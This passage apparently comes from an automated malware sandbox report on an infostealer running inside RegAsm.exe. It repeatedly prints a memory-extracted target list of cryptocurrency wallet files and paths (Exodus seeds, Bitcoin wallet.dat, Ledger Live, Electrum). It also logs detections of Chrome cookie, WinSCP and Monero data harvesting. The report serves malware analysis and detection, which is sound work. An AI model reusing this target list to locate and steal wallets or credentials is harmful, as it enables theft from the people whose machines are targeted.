Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Exodus Web3 Wallet
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Opens network shares
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: \\config\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: \\config\Jump to behavior
              Tries to harvest and steal Bitcoin Wallet information
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
